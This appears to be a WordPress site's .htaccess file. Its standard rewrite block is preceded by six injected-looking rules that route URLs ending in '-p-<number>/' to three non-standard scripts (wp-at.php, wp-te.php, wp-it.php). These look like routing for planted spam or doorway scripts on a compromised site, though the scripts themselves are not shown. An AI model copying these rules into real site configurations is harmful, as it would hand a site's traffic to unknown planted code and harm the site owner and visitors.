RewriteCond %{DOCUMENT_ROOT}/wp-at.php -f
RewriteRule ^.*-p-(\d+)/$ wp-at.php?p=$1&%{QUERY_STRING} [L]
RewriteCond %{DOCUMENT_ROOT}/wp-te.php -f
RewriteRule ^.*-p-(\d+)/$ wp-te.php?p=$1&%{QUERY_STRING} [L]
RewriteCond %{DOCUMENT_ROOT}/wp-it.php -f
RewriteRule ^.*-p-(\d+)/$ wp-it.php?p=$1&%{QUERY_STRING} [L]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress